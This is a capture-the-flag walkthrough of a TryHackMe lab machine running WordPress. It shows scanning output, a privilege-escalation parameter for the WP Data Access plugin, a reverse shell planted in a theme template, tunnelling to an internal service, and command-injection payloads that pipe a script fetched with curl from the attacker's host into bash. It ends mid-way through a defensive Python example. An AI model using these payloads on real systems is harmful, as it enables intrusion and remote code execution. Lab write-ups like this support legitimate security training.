┌──(kali㉿kali)-[~]
└─$ nmap breakme.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:14 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 9.34 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 22,80 breakme.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-07 11:21 IST
Nmap scan report for breakme.thm (10.10.221.241)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 8e:4f:77:7f:f6:aa:6a:dc:17:c9:bf:5a:2b:eb:8c:41 (RSA)
| 256 a3:9c:66:73:fc:b9:23:c0:0f:da:1d:c9:84:d6:b1:4a (ECDSA)
|_ 256 6d:c2:0e:89:25:55:10:a9:9e:41:6e:0d:81:9a:17:cb (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.18 seconds
We use Feroxbuster for a directory scan. The results make it evident that the web server is running WordPress.
┌──(kali㉿kali)-[~]
└─$ feroxbuster -u http://breakme.thm/ -w /usr/share/wordlists/dirb/big.txt
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.10.3
───────────────────────────┬──────────────────────
🎯 Target Url │ http://breakme.thm/
🚀 Threads │ 50
📖 Wordlist │ /usr/share/wordlists/dirb/big.txt
👌 Status Codes │ All Status Codes!
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.10.3
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔎 Extract Links │ true
🏁 HTTP methods │ [GET]
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Management Menu™
──────────────────────────────────────────────────
403 GET 9l 28w 276c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404 GET 9l 31w 273c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
200 GET 24l 126w 10355c http://breakme.thm/icons/openlogo-75.png
200 GET 368l 933w 10701c http://breakme.thm/
301 GET 9l 28w 311c http://breakme.thm/manual => http://breakme.thm/manual/
301 GET 9l 28w 314c http://breakme.thm/manual/da => http://breakme.thm/manual/da/
301 GET 9l 28w 314c http://breakme.thm/manual/en => http://breakme.thm/manual/en/
301 GET 9l 28w 314c http://breakme.thm/manual/de => http://breakme.thm/manual/de/
301 GET 9l 28w 314c http://breakme.thm/manual/es => http://breakme.thm/manual/es/
301 GET 9l 28w 318c http://breakme.thm/manual/images => http://breakme.thm/manual/images/
200 GET 3l 26w 3083c http://breakme.thm/manual/images/mod_rewrite_fig1.png
200 GET 1l 5w 87c http://breakme.thm/manual/images/right.gif
200 GET 10l 34w 2420c http://breakme.thm/manual/images/mod_rewrite_fig2.png
200 GET 18l 118w 6536c http://breakme.thm/manual/images/feather.gif
200 GET 1l 5w 84c http://breakme.thm/manual/images/down.gif
200 GET 14l 54w 2412c http://breakme.thm/manual/images/index.gif
200 GET 25l 87w 6358c http://breakme.thm/manual/images/mod_rewrite_fig1.gif
200 GET 16l 74w 5983c http://breakme.thm/manual/images/ssl_intro_fig1.png
200 GET 8l 24w 1868c http://breakme.thm/manual/images/mod_filter_new.png
200 GET 26l 111w 10616c http://breakme.thm/manual/images/ssl_intro_fig1.gif
200 GET 50l 355w 31098c http://breakme.thm/manual/images/custom_errordocs.png
200 GET 105l 493w 29291c http://breakme.thm/manual/images/caching_fig1.gif
301 GET 9l 28w 314c http://breakme.thm/manual/fr => http://breakme.thm/manual/fr/
200 GET 158l 1179w 92140c http://breakme.thm/manual/images/build_a_mod_3.png
200 GET 931l 5534w 463351c http://breakme.thm/manual/images/bal-man.png
301 GET 9l 28w 314c http://breakme.thm/manual/ja => http://breakme.thm/manual/ja/
301 GET 9l 28w 314c http://breakme.thm/manual/ko => http://breakme.thm/manual/ko/
301 GET 9l 28w 324c http://breakme.thm/manual/da/developer => http://breakme.thm/manual/da/developer/
301 GET 9l 28w 318c http://breakme.thm/manual/da/faq => http://breakme.thm/manual/da/faq/
301 GET 9l 28w 324c http://breakme.thm/manual/en/developer => http://breakme.thm/manual/en/developer/
301 GET 9l 28w 324c http://breakme.thm/manual/de/developer => http://breakme.thm/manual/de/developer/
301 GET 9l 28w 324c http://breakme.thm/manual/es/developer => http://breakme.thm/manual/es/developer/
301 GET 9l 28w 317c http://breakme.thm/manual/pt-br => http://breakme.thm/manual/pt-br/
301 GET 9l 28w 320c http://breakme.thm/manual/da/howto => http://breakme.thm/manual/da/howto/
301 GET 9l 28w 324c http://breakme.thm/manual/ja/developer => http://breakme.thm/manual/ja/developer/
301 GET 9l 28w 314c http://breakme.thm/manual/ru => http://breakme.thm/manual/ru/
301 GET 9l 28w 318c http://breakme.thm/manual/es/faq => http://breakme.thm/manual/es/faq/
301 GET 9l 28w 318c http://breakme.thm/manual/de/faq => http://breakme.thm/manual/de/faq/
301 GET 9l 28w 317c http://breakme.thm/manual/style => http://breakme.thm/manual/style/
200 GET 42l 190w 1425c http://breakme.thm/manual/style/sitemap.dtd
200 GET 24l 127w 907c http://breakme.thm/manual/style/lang.dtd
301 GET 9l 28w 320c http://breakme.thm/manual/en/howto => http://breakme.thm/manual/en/howto/
200 GET 1622l 6889w 73959c http://breakme.thm/manual/style/scripts/prettify.js
200 GET 5l 21w 167c http://breakme.thm/manual/style/scripts/MINIFY
301 GET 9l 28w 320c http://breakme.thm/manual/es/howto => http://breakme.thm/manual/es/howto/
301 GET 9l 28w 320c http://breakme.thm/manual/de/howto => http://breakme.thm/manual/de/howto/
301 GET 9l 28w 314c http://breakme.thm/manual/tr => http://breakme.thm/manual/tr/
301 GET 9l 28w 314c http://breakme.thm/wordpress => http://breakme.thm/wordpress/
301 GET 9l 28w 324c http://breakme.thm/manual/ko/developer => http://breakme.thm/manual/ko/developer/
301 GET 9l 28w 319c http://breakme.thm/manual/da/misc => http://breakme.thm/manual/da/misc/
301 GET 9l 28w 320c http://breakme.thm/manual/ja/howto => http://breakme.thm/manual/ja/howto/
301 GET 9l 28w 318c http://breakme.thm/manual/da/mod => http://breakme.thm/manual/da/mod/
301 GET 9l 28w 318c http://breakme.thm/manual/ko/faq => http://breakme.thm/manual/ko/faq/
301 GET 9l 28w 320c http://breakme.thm/manual/fr/howto => http://breakme.thm/manual/fr/howto/
301 GET 9l 28w 317c http://breakme.thm/manual/zh-cn => http://breakme.thm/manual/zh-cn/
301 GET 9l 28w 319c http://breakme.thm/manual/en/misc => http://breakme.thm/manual/en/misc/
301 GET 9l 28w 319c http://breakme.thm/manual/es/misc => http://breakme.thm/manual/es/misc/
301 GET 9l 28w 318c http://breakme.thm/manual/en/mod => http://breakme.thm/manual/en/mod/
301 GET 9l 28w 323c http://breakme.thm/manual/da/platform => http://breakme.thm/manual/da/platform/
301 GET 9l 28w 323c http://breakme.thm/manual/da/programs => http://breakme.thm/manual/da/programs/
301 GET 9l 28w 319c http://breakme.thm/manual/de/misc => http://breakme.thm/manual/de/misc/
301 GET 9l 28w 318c http://breakme.thm/manual/es/mod => http://breakme.thm/manual/es/mod/
301 GET 9l 28w 321c http://breakme.thm/manual/es/vhosts => http://breakme.thm/manual/es/vhosts/
301 GET 9l 28w 324c http://breakme.thm/manual/tr/developer => http://breakme.thm/manual/tr/developer/
301 GET 9l 28w 325c http://breakme.thm/wordpress/wp-content => http://breakme.thm/wordpress/wp-content/
301 GET 9l 28w 323c http://breakme.thm/wordpress/wp-admin => http://breakme.thm/wordpress/wp-admin/
301 GET 9l 28w 326c http://breakme.thm/wordpress/wp-includes => http://breakme.thm/wordpress/wp-includes/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/assets => http://breakme.thm/wordpress/wp-includes/assets/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/blocks => http://breakme.thm/wordpress/wp-includes/blocks/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/certificates => http://breakme.thm/wordpress/wp-includes/certificates/
301 GET 9l 28w 327c http://breakme.thm/wordpress/wp-admin/css => http://breakme.thm/wordpress/wp-admin/css/
301 GET 9l 28w 330c http://breakme.thm/wordpress/wp-includes/css => http://breakme.thm/wordpress/wp-includes/css/
301 GET 9l 28w 336c http://breakme.thm/wordpress/wp-includes/customize => http://breakme.thm/wordpress/wp-includes/customize/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/audio => http://breakme.thm/wordpress/wp-includes/blocks/audio/
301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/archives => http://breakme.thm/wordpress/wp-includes/blocks/archives/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/avatar => http://breakme.thm/wordpress/wp-includes/blocks/avatar/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/button => http://breakme.thm/wordpress/wp-includes/blocks/button/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/buttons => http://breakme.thm/wordpress/wp-includes/blocks/buttons/
301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/calendar => http://breakme.thm/wordpress/wp-includes/blocks/calendar/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/block => http://breakme.thm/wordpress/wp-includes/blocks/block/
301 GET 9l 28w 344c http://breakme.thm/wordpress/wp-includes/blocks/categories => http://breakme.thm/wordpress/wp-includes/blocks/categories/
301 GET 9l 28w 330c http://breakme.thm/wordpress/wp-admin/images => http://breakme.thm/wordpress/wp-admin/images/
301 GET 9l 28w 326c http://breakme.thm/wordpress/wp-admin/js => http://breakme.thm/wordpress/wp-admin/js/
301 GET 9l 28w 332c http://breakme.thm/wordpress/wp-admin/includes => http://breakme.thm/wordpress/wp-admin/includes/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/code => http://breakme.thm/wordpress/wp-includes/blocks/code/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-includes/images => http://breakme.thm/wordpress/wp-includes/images/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/column => http://breakme.thm/wordpress/wp-includes/blocks/column/
301 GET 9l 28w 342c http://breakme.thm/wordpress/wp-includes/blocks/comments => http://breakme.thm/wordpress/wp-includes/blocks/comments/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/columns => http://breakme.thm/wordpress/wp-includes/blocks/columns/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/cover => http://breakme.thm/wordpress/wp-includes/blocks/cover/
301 GET 9l 28w 329c http://breakme.thm/wordpress/wp-includes/js => http://breakme.thm/wordpress/wp-includes/js/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/details => http://breakme.thm/wordpress/wp-includes/blocks/details/
301 GET 9l 28w 329c http://breakme.thm/wordpress/wp-admin/maint => http://breakme.thm/wordpress/wp-admin/maint/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/embed => http://breakme.thm/wordpress/wp-includes/blocks/embed/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-admin/css/colors => http://breakme.thm/wordpress/wp-admin/css/colors/
301 GET 9l 28w 331c http://breakme.thm/wordpress/wp-admin/network => http://breakme.thm/wordpress/wp-admin/network/
301 GET 9l 28w 335c http://breakme.thm/wordpress/wp-includes/css/dist => http://breakme.thm/wordpress/wp-includes/css/dist/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/file => http://breakme.thm/wordpress/wp-includes/blocks/file/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/gallery => http://breakme.thm/wordpress/wp-includes/blocks/gallery/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/group => http://breakme.thm/wordpress/wp-includes/blocks/group/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/heading => http://breakme.thm/wordpress/wp-includes/blocks/heading/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/html => http://breakme.thm/wordpress/wp-includes/blocks/html/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/image => http://breakme.thm/wordpress/wp-includes/blocks/image/
301 GET 9l 28w 333c http://breakme.thm/wordpress/wp-content/plugins => http://breakme.thm/wordpress/wp-content/plugins/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/list => http://breakme.thm/wordpress/wp-includes/blocks/list/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/images/crystal => http://breakme.thm/wordpress/wp-includes/images/crystal/
301 GET 9l 28w 335c http://breakme.thm/wordpress/wp-includes/sitemaps => http://breakme.thm/wordpress/wp-includes/sitemaps/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-includes/js/dist => http://breakme.thm/wordpress/wp-includes/js/dist/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-includes/js/crop => http://breakme.thm/wordpress/wp-includes/js/crop/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/blocks/missing => http://breakme.thm/wordpress/wp-includes/blocks/missing/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/blocks/more => http://breakme.thm/wordpress/wp-includes/blocks/more/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-content/plugins/akismet => http://breakme.thm/wordpress/wp-content/plugins/akismet/
301 GET 9l 28w 328c http://breakme.thm/wordpress/wp-admin/user => http://breakme.thm/wordpress/wp-admin/user/
301 GET 9l 28w 344c http://breakme.thm/wordpress/wp-includes/blocks/navigation => http://breakme.thm/wordpress/wp-includes/blocks/navigation/
301 GET 9l 28w 332c http://breakme.thm/wordpress/wp-content/themes => http://breakme.thm/wordpress/wp-content/themes/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/blocks/query => http://breakme.thm/wordpress/wp-includes/blocks/query/
301 GET 9l 28w 340c http://breakme.thm/wordpress/wp-includes/blocks/spacer => http://breakme.thm/wordpress/wp-includes/blocks/spacer/
301 GET 9l 28w 341c http://breakme.thm/wordpress/wp-includes/images/smilies => http://breakme.thm/wordpress/wp-includes/images/smilies/
301 GET 9l 28w 339c http://breakme.thm/wordpress/wp-includes/js/swfupload => http://breakme.thm/wordpress/wp-includes/js/swfupload/
301 GET 9l 28w 338c http://breakme.thm/wordpress/wp-includes/js/thickbox => http://breakme.thm/wordpress/wp-includes/js/thickbox/
301 GET 9l 28w 337c http://breakme.thm/wordpress/wp-includes/js/tinymce => http://breakme.thm/wordpress/wp-includes/js/tinymce/
301 GET 9l 28w 345c http://breakme.thm/wordpress/wp-includes/sitemaps/providers => http://breakme.thm/wordpress/wp-includes/sitemaps/providers/
301 GET 9l 28w 334c http://breakme.thm/wordpress/wp-admin/js/widgets => http://breakme.thm/wordpress/wp-admin/js/widgets/
Visiting the index page, we are just greeted with an Apache2 Debian default page.
We visit the WordPress site and discover that it is a straightforward blog.
http://breakme.thm/wordpress/
We seem to be in the right place: http://breakme.thm/wordpress/index.php/breakme/.
Next, we use WPScan to analyze the WordPress application. It reveals that the site is running version 6.4.3, which contains a vulnerability allowing user enumeration.
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct 7 12:17:29 2024
.
.
.
.
[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
| Found By: Rss Generator (Passive Detection)
| - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
| - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
[+] WordPress theme in use: twentytwentyfour
| Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.2
| Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
Initial Access
We continue focusing on the WordPress site and run additional WPScan assessments to extract more useful information. These scans help identify potential vulnerabilities that could be exploited.
WPScan Part I - Enum Credentials
We begin by attempting to enumerate existing users on the WordPress site. Through this process, we successfully identify two users: bob and admin.
A link in the sample page http://breakme.thm/wordpress/index.php/sample-page takes us to the login window.
We log in using the discovered credentials but realize that the account doesn't have elevated privileges. The admin dashboard is not visible, indicating this user has limited permissions.
We can make changes to our profile and are able to make minor adjustments at the dashboard.
WPScan Part II - Further Enumeration (WPScan API Key)
It looks like we haven't discovered everything yet. Next we run another WPScan, this time with an API key.
The key can be obtained free of charge after registering on the WPScan website. With it, WPScan matches its findings against known CVEs.
We run the WPScan using the API key and discover an interesting finding that belongs to CVE-2023-1874, which is WP Data Access <= 5.3.7 - Authenticated (Subscriber+) Privilege Escalation.
┌──(kali㉿kali)-[~]
└─$ export WPSCAN_API_TOKEN=[REDACTED]
┌──(kali㉿kali)-[~]
└─$ wpscan --url http://breakme.thm/wordpress/
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.25
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://breakme.thm/wordpress/ [10.10.221.241]
[+] Started: Mon Oct 7 12:53:11 2024
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.56 (Debian)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://breakme.thm/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://breakme.thm/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://breakme.thm/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 6.4.3 identified (Insecure, released on 2024-01-30).
| Found By: Rss Generator (Passive Detection)
| - http://breakme.thm/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
| - http://breakme.thm/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.4.3</generator>
|
| [!] 4 vulnerabilities identified:
|
| [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
| Fixed in: 6.4.4
| References:
| - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
| - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
| Fixed in: 6.4.5
| References:
| - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
| Fixed in: 6.4.5
| References:
| - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
|
| [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
| Fixed in: 6.4.5
| References:
| - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
| - https://wordpress.org/news/2024/06/wordpress-6-5-5/
[+] WordPress theme in use: twentytwentyfour
| Location: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/
| Last Updated: 2024-07-16T00:00:00.000Z
| Readme: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/readme.txt
| [!] The version is out of date, the latest version is 1.2
| Style URL: http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css
| Style Name: Twenty Twenty-Four
| Style URI: https://wordpress.org/themes/twentytwentyfour/
| Description: Twenty Twenty-Four is designed to be flexible, versatile and applicable to any website. Its collecti...
| Author: the WordPress team
| Author URI: https://wordpress.org
|
| Found By: Urls In Homepage (Passive Detection)
|
| Version: 1.0 (80% confidence)
| Found By: Style (Passive Detection)
| - http://breakme.thm/wordpress/wp-content/themes/twentytwentyfour/style.css, Match: 'Version: 1.0'
[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] wp-data-access
| Location: http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/
| Last Updated: 2024-09-18T00:01:00.000Z
| [!] The version is out of date, the latest version is 5.5.14
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 3 vulnerabilities identified:
|
| [!] Title: WP Data Access < 5.3.8 - Subscriber+ Privilege Escalation
| Fixed in: 5.3.8
| References:
| - https://wpscan.com/vulnerability/7871b890-5172-40aa-88f2-a1b95e240ad4
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1874
| - https://www.wordfence.com/blog/2023/04/privilege-escalation-vulnerability-patched-promptly-in-wp-data-access-wordpress-plugin/
|
| [!] Title: Freemius SDK < 2.5.10 - Reflected Cross-Site Scripting
| Fixed in: 5.3.11
| References:
| - https://wpscan.com/vulnerability/39d1f22f-ea34-4d94-9dc2-12661cf69d36
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33999
|
| [!] Title: WP Data Access < 5.5.9 - Cross-Site Request Forgery
| Fixed in: 5.5.9
| References:
| - https://wpscan.com/vulnerability/4fe0d330-6511-4500-ac3f-b9bb944b8f0e
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43295
| - https://www.wordfence.com/threat-intel/vulnerabilities/id/85a33508-71f2-4aa1-8d51-667eb0690fbd
|
| Version: 5.3.5 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://breakme.thm/wordpress/wp-content/plugins/wp-data-access/readme.txt
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:05 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:05
[i] No Config Backups Found.
[+] WPScan DB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 22
[+] Finished: Mon Oct 7 12:53:26 2024
[+] Requests Done: 176
[+] Cached Requests: 5
[+] Data Sent: 47.983 KB
[+] Data Received: 311.351 KB
[+] Memory used: 273.23 MB
[+] Elapsed time: 00:00:14
We can find out more about the vulnerability in the following post:
So we update our profile first.
We submit the request and intercept it via Burp Suite. We must now add the following parameter, which is not already set.
&wpda_role[]=administrator
We assign ourselves the administrator role. However, if we make an error with the parameter and input it incorrectly, we risk being locked out and losing access to the dashboard, requiring a machine restart to regain access.
Reverse Shell
To establish a foothold, we leverage our elevated privileges to create a reverse shell. Following guidance from Hacktricks, we modify a template page's content with a reverse shell script, utilizing revshells.com to generate a suitable Pentest Monkey reverse shell. We ensure this process runs in the background while setting up a listener to catch the incoming connection.
Next, we open the following page to update a template with the reverse shell.
Here we first switch the theme to Twenty Twenty-One, because it has a PHP template for the 404 page. We select this file, replace its entire content with the reverse shell and then update the file.
Now we only need to call up our edited page with the following URL:
We then get a reverse shell on our listener and upgrade our shell. We are www-data, but don't have access to the first flag for the time being.
┌──(kali㉿kali)-[~]
└─$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.221.241] 43952
Linux Breakme 5.10.0-8-amd64 #1 SMP Debian 5.10.46-4 (2021-08-03) x86_64 GNU/Linux
03:49:00 up 2:18, 0 users, load average: 0.00, 0.00, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (616): Inappropriate ioctl for device
bash: no job control in this shell
www-data@Breakme:/$
First, let's upgrade this shell.
We transfer linpeas to the machine and run it.
After our Linpeas scan we find access possibilities to files of other users john and youcef.
We find the first flag in john's home directory, but have no access to it. We may have to get access to user john.
Reverse Shell as john
While enumerating as www-data, we detect an internal service listening on port 9999.
www-data@Breakme:/home/john$ netstat -tulnp
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9999 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
This seems to be another site, possibly an entry point to user john.
Before we continue, let's take a look at possible processes running in the background using Pspy. Here we see that the service is a web server running in the context of the user with the uid 1002.
This is our user john.
We now want to investigate the service on port 9999 further. To do this, we create a tunnel using Ligolo-ng to gain access to it.
Setup Ligolo-ng
First, we set up a TUN (network tunnel) interface named "ligolo" and add a route so that traffic for 240.0.0.1 is forwarded through the tunnel.
┌──(kali㉿kali)-[~]
└─$ sudo ip tuntap add user 0xb0b mode tun ligolo
[sudo] password for kali:
┌──(kali㉿kali)-[~]
└─$ sudo ip link set ligolo up
┌──(kali㉿kali)-[~]
└─$ sudo ip route add 240.0.0.1 dev ligolo
Next, we download the latest release of ligolo-ng. We need the amd64 builds of both the proxy and the agent.
On our attack machine, we start the proxy server.
./proxy -selfcert
Next on the target machine we start the agent to connect to our proxy.
./agent -connect 10.8.211.1:11601 --ignore-cert
We receive a message on our ligolo-ng proxy that an agent has joined. We select the session using session and then start it.
We are now able to reach internal port 9999 via the address 240.0.0.1.
Here we have a page with tools that include a check target, a check user and check file. This suggests that some kind of command injection could be possible.
If we enter our IP at Check Target, we find that a ping is actually executed. The input only allows the numerical representation of IP addresses.
Check User reflects whatever we enter. However, we cannot find a valid user, not even the known john, bob or www-data.
The file check does not seem to find any files either. Special characters or numbers do not seem to be permitted here.
We enter a set of special characters in Check User and see that a small set is reflected. Not everything is removed. We also notice that the space character is removed.
!@#$%^&*()_+-={}[]|:;'"<>,.?/
With the set of special characters that survives the filter, we can try the following command injection. We use the ${IFS} variable in place of the space and use a pipe so that the output of the original command is fed into our ping command.
|ping${IFS}10.17.15.155
We then capture the pings via tcpdump and see that our command injection was successful.
Next, we prepare a simple reverse shell payload. Since & is stripped, we host the reverse shell as a script, fetch it with curl and execute it within the same injected command.
Then we set up a Python web server to provide the payload.
We replace our ping with a curl command, to see if we can successfully request the payload.
|curl${IFS}http://10.17.15.155/payload.sh
Now we set up a listener on port 4446 and adapt our command with a pipe to bash.
|curl${IFS}http://10.17.15.155/payload.sh|bash
This gives us our first flag.
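The Check Target and Check User tools above fail because they strip a blocklist of characters and then hand the remainder to a shell. As an added example (not code from the machine or the original write-up), the following Python contrasts that design with an allowlist validator that passes an argv list to the program, so no shell ever parses user input; the stripped character set and the ping options are assumptions for the illustration.

```python
import ipaddress
import pwd
import re

# Characters the page's filter was observed to remove (space and '&');
# ';' and newline are added here as an assumption. Everything else,
# including '|', '$', '{' and '}', passes straight through.
STRIPPED = set(" &;\n")


def filtered_ping_command(user_input: str) -> str:
    """The weak design: delete 'bad' characters, then build a shell string.
    Returns the string that would reach `sh -c`; it is never executed here."""
    cleaned = "".join(ch for ch in user_input if ch not in STRIPPED)
    return f"ping -c 1 {cleaned}"


_IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
_USERNAME = re.compile(r"[a-z_][a-z0-9_-]{0,31}")


def safe_ping_argv(user_input: str) -> list:
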